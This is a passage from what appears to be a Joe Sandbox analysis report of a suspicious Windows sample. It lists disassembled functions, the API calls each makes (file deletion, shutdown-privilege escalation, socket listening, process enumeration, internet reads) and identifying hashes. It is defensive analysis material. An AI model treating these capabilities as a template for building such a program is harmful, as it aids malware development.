                                                                                                                        • Part of subcall function 004C4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004C4743,?,?,004C37AE,?), ref: 004C4770
                                                                                                                        • Part of subcall function 00524A31: GetFileAttributesW.KERNEL32(?,0052370B), ref: 00524A32
                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00523B89
                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 00523BD9
                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00523BEA
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00523C01
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00523C0A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                      • String ID: \*.*
                                                                                                                      • API String ID: 2649000838-1173974218
                                                                                                                      • Opcode ID: 3451660058b85636beb5daa77478e2b56a914de4c920f1293bacef04cbdebc37
                                                                                                                      • Instruction ID: f1b9a2972729f7edfe453aec917bb401558eb6be23cd72314ab69029f6fbd91f
                                                                                                                      • Opcode Fuzzy Hash: 3451660058b85636beb5daa77478e2b56a914de4c920f1293bacef04cbdebc37
                                                                                                                      • Instruction Fuzzy Hash: F13194390083959BC301EF24D895DAFBBA8BEA6318F404D2EF4D592191EB349A0CDB57
                                                                                                                      Function 005251BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 005187E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0051882B
                                                                                                                        • Part of subcall function 005187E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00518858
                                                                                                                        • Part of subcall function 005187E1: GetLastError.KERNEL32 ref: 00518865
                                                                                                                      • ExitWindowsEx.USER32(?,00000000), ref: 005251F9
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                      • String ID: $@$SeShutdownPrivilege
                                                                                                                      • API String ID: 2234035333-194228
                                                                                                                      • Opcode ID: bff1f9a9690b67813fabc62d31bc3dec7bb7e34bd4d2106cb2b536c2147aefa4
                                                                                                                      • Instruction ID: c74eb68a5a34221071b21aa2cfdda68316473fbd44cf4afdeb34988254af1033
                                                                                                                      • Opcode Fuzzy Hash: bff1f9a9690b67813fabc62d31bc3dec7bb7e34bd4d2106cb2b536c2147aefa4
                                                                                                                      • Instruction Fuzzy Hash: 6201D83D691631ABF72C5268BC4AFFA7A58FF17350F500821F907E20D2FA715C009590
                                                                                                                      Function 00536283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • socket.WSOCK32(00000002,00000001,00000006), ref: 005362DC
                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 005362EB
                                                                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00536307
                                                                                                                      • listen.WSOCK32(00000000,00000005), ref: 00536316
                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00536330
                                                                                                                      • closesocket.WSOCK32(00000000), ref: 00536344
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1279440585-0
                                                                                                                      • Opcode ID: 00f317bd5c3412be68e0c7af03ac74f8c3d82c76b6963953270beef0fa831d45
                                                                                                                      • Instruction ID: cb77f4cc170872ba441e2c79d4bbacb72c17c024fabf5b96220f975f7befaa59
                                                                                                                      • Opcode Fuzzy Hash: 00f317bd5c3412be68e0c7af03ac74f8c3d82c76b6963953270beef0fa831d45
                                                                                                                      • Instruction Fuzzy Hash: BC21C139600204AFCB10EF68C849FAEBBA9FF49724F15855DE816A7291CB74AC05DB51
                                                                                                                      Function 004D5520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004E0DB6: std::exception::exception.LIBCMT ref: 004E0DEC
                                                                                                                        • Part of subcall function 004E0DB6: __CxxThrowException@8.LIBCMT ref: 004E0E01
                                                                                                                      • _memmove.LIBCMT ref: 00510258
                                                                                                                      • _memmove.LIBCMT ref: 0051036D
                                                                                                                      • _memmove.LIBCMT ref: 00510414
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1300846289-0
                                                                                                                      • Opcode ID: 62c8790bd0ec7e69b016e953ebd4d6d25f3581dc90c3654cf49e44c3f8c1f572
                                                                                                                      • Instruction ID: 624d0d3d6dfcf9485ff539be75a6e8d35a2cf08d83e48dc26a226f6dd9d293e6
                                                                                                                      • Opcode Fuzzy Hash: 62c8790bd0ec7e69b016e953ebd4d6d25f3581dc90c3654cf49e44c3f8c1f572
                                                                                                                      • Instruction Fuzzy Hash: 8402D1B0A00209DBDF04DF65D981AAE7BB5FF44304F10846EE80ADB395EB78D994CB95
                                                                                                                      Function 004C1287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004C2612: GetWindowLongW.USER32(?,000000EB), ref: 004C2623
                                                                                                                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 004C19FA
                                                                                                                      • GetSysColor.USER32(0000000F), ref: 004C1A4E
                                                                                                                      • SetBkColor.GDI32(?,00000000), ref: 004C1A61
                                                                                                                        • Part of subcall function 004C1290: DefDlgProcW.USER32(?,00000020,?), ref: 004C12D8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ColorProc$LongWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3744519093-0
                                                                                                                      • Opcode ID: 23dd84da5ae4b05f854312d7cf18723782094cb861a91e4d63b2142a41a199d9
                                                                                                                      • Instruction ID: ad999eec9931fd7bb51b362d104280dff13b1056e121e31d7d65b6e8148b662f
                                                                                                                      • Opcode Fuzzy Hash: 23dd84da5ae4b05f854312d7cf18723782094cb861a91e4d63b2142a41a199d9
                                                                                                                      • Instruction Fuzzy Hash: EBA13EB9102549BAE664AA298C48FBF295CEB83345F14011FF503D52B3DA2DDD02D6BF
                                                                                                                      Function 0052BCBC Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0052BCE6
                                                                                                                      • _wcscmp.LIBCMT ref: 0052BD16
                                                                                                                      • _wcscmp.LIBCMT ref: 0052BD2B
                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0052BD3C
                                                                                                                      • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0052BD6C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2387731787-0
                                                                                                                      • Opcode ID: 2d6c76775793c6e3b4e439dfb93831065c6e6e2851b722787338f8c34cae8402
                                                                                                                      • Instruction ID: a8a2f6ddafafd51e8969d26a151b4baf643692fcd743d50cb41da473eb156eb7
                                                                                                                      • Opcode Fuzzy Hash: 2d6c76775793c6e3b4e439dfb93831065c6e6e2851b722787338f8c34cae8402
                                                                                                                      • Instruction Fuzzy Hash: EE519B396046129FD714DF29D490EEABBE4FF4A324F104A1EE956873A1DB34ED04CB91
                                                                                                                      Function 00536747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00537D8B: inet_addr.WSOCK32(00000000), ref: 00537DB6
                                                                                                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 0053679E
                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 005367C7
                                                                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00536800
                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 0053680D
                                                                                                                      • closesocket.WSOCK32(00000000), ref: 00536821
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 99427753-0
                                                                                                                      • Opcode ID: 0c4e0c4a01113fae5aee916e797c5955299380101541d48ee95ae10a4f1fd740
                                                                                                                      • Instruction ID: 2f4a1922adadc87cd4d5f5861c7b196c1b05c6adffec4a7f6eb134ca225466dd
                                                                                                                      • Opcode Fuzzy Hash: 0c4e0c4a01113fae5aee916e797c5955299380101541d48ee95ae10a4f1fd740
                                                                                                                      • Instruction Fuzzy Hash: A241E779A00200BFDB50BF258C8AF6E77E8EF45718F44845DF916AB3C2CA749D0187A5
                                                                                                                      Function 00545376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 292994002-0
                                                                                                                      • Opcode ID: 6004bd0c443c2528d1084afeb6dfde533c420ecce43813326af6e97482bdc0bc
                                                                                                                      • Instruction ID: cbf8d1644335939fe061844a0012ea74deed8bcaf2c22b77141209e2d1a54ddb
                                                                                                                      • Opcode Fuzzy Hash: 6004bd0c443c2528d1084afeb6dfde533c420ecce43813326af6e97482bdc0bc
                                                                                                                      • Instruction Fuzzy Hash: 1711E235300911AFEB206F269C48BEE7F98FF457A8B41483DF806D7242EB749C018AA4
                                                                                                                      Function 005180A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 005180C0
                                                                                                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 005180CA
                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 005180D9
                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 005180E0
                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 005180F6
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 44706859-0
                                                                                                                      • Opcode ID: d5ac42d8baad5f346c7aa82cd88a7766ec06fc34a9aa44e16c1f704b8f8eb213
                                                                                                                      • Instruction ID: 661edaef42a26a1e0cb12efe85f0f44d8bf11a38f1e72d1f80c78108d80b89a7
                                                                                                                      • Opcode Fuzzy Hash: d5ac42d8baad5f346c7aa82cd88a7766ec06fc34a9aa44e16c1f704b8f8eb213
                                                                                                                      • Instruction Fuzzy Hash: 86F04F35240204BFEB200FA9EC8DEFB3FACFF8A759B000025F949C6150CA619C45EB60
                                                                                                                      Function 0052C397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CoInitialize.OLE32(00000000), ref: 0052C432
                                                                                                                      • CoCreateInstance.OLE32(00552D6C,00000000,00000001,00552BDC,?), ref: 0052C44A
                                                                                                                        • Part of subcall function 004C7DE1: _memmove.LIBCMT ref: 004C7E22
                                                                                                                      • CoUninitialize.OLE32 ref: 0052C6B7
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                                      • String ID: .lnk
                                                                                                                      • API String ID: 2683427295-24824748
                                                                                                                      • Opcode ID: 472fa0a5f4da2b2d52e20538a1243aa59562e02a32379c63d43b5be042c2e12b
                                                                                                                      • Instruction ID: ba7c4ce1994732bfd817e9a965f2ad5450a40d985ddcce36b8f3cad317185dbc
                                                                                                                      • Opcode Fuzzy Hash: 472fa0a5f4da2b2d52e20538a1243aa59562e02a32379c63d43b5be042c2e12b
                                                                                                                      • Instruction Fuzzy Hash: E3A15AB5104205AFD340EF54C885EAFB7E8FF89348F00491DF1968B192EB70AE49CB66
                                                                                                                      Function 004C4B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,004C4AD0), ref: 004C4B45
                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 004C4B57
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                      • API String ID: 2574300362-192647395
                                                                                                                      • Opcode ID: e800f379dedb5c5ce202d62e6a24d0af6febda469cc8962e6467660c7b5414ae
                                                                                                                      • Instruction ID: 4c50a195aae90398f0e561675170e6459d915b979a6829e9afbb40c6ea89671c
                                                                                                                      • Opcode Fuzzy Hash: e800f379dedb5c5ce202d62e6a24d0af6febda469cc8962e6467660c7b5414ae
                                                                                                                      • Instruction Fuzzy Hash: 47D01278E10713CFD7609F39D928F8776E4AF56399B11883E9485D6250E674E880C758
                                                                                                                      Function 0053EE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 0053EE3D
                                                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 0053EE4B
                                                                                                                        • Part of subcall function 004C7DE1: _memmove.LIBCMT ref: 004C7E22
                                                                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 0053EF0B
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0053EF1A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2576544623-0
                                                                                                                      • Opcode ID: a3549efca14a8407bb320bafb00f1920289adf4900f867ad86904e729371526a
                                                                                                                      • Instruction ID: 222ab70398f789138353ae701ca8004717f3db9eb0285a1660d398988a1a3b54
                                                                                                                      • Opcode Fuzzy Hash: a3549efca14a8407bb320bafb00f1920289adf4900f867ad86904e729371526a
                                                                                                                      • Instruction Fuzzy Hash: CB519075504301AFD350EF25C886F6BBBE8FF94714F10482EF595972A1EB70A908CB96
                                                                                                                      Function 0051E616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0051E628
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: lstrlen
                                                                                                                      • String ID: ($|
                                                                                                                      • API String ID: 1659193697-1631851259
                                                                                                                      • Opcode ID: c5e1312268e159b83378cfba8d87a36d0cd55d3c4fdd58fa43c957a8d9eb6fdf
                                                                                                                      • Instruction ID: 43639de2f9f7a56da3c8e188603c6a6429e471d6f418d34bfadc04a68f8b88af
                                                                                                                      • Opcode Fuzzy Hash: c5e1312268e159b83378cfba8d87a36d0cd55d3c4fdd58fa43c957a8d9eb6fdf
                                                                                                                      • Instruction Fuzzy Hash: 62322775A007059FE728CF19D4859AABBF1FF48320B15C46EE89ADB3A1D770E981CB44
                                                                                                                      Function 005322EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0053180A,00000000), ref: 005323E1
                                                                                                                      • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00532418
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 599397726-0
                                                                                                                      • Opcode ID: 820f8736175f85f8c29140c06a10f635ba07e63ecc5271b306d776ff67e5f9ae
                                                                                                                      • Instruction ID: 076ca5dbfe65856941a1788fe1b69e970671e31f7e833ef8c3d99a8a099f1f25
                                                                                                                      • Opcode Fuzzy Hash: 820f8736175f85f8c29140c06a10f635ba07e63ecc5271b306d776ff67e5f9ae
                                                                                                                      • Instruction Fuzzy Hash: 0041F571904A09BFEF10DE95DC85FBBBFBCFB40724F10446EF605A6140EA759E419660
                                                                                                                      Function 0052B333 Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0052B343
                                                                                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0052B39D
                                                                                                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0052B3EA
                                                                                                                      Memory Dump Source
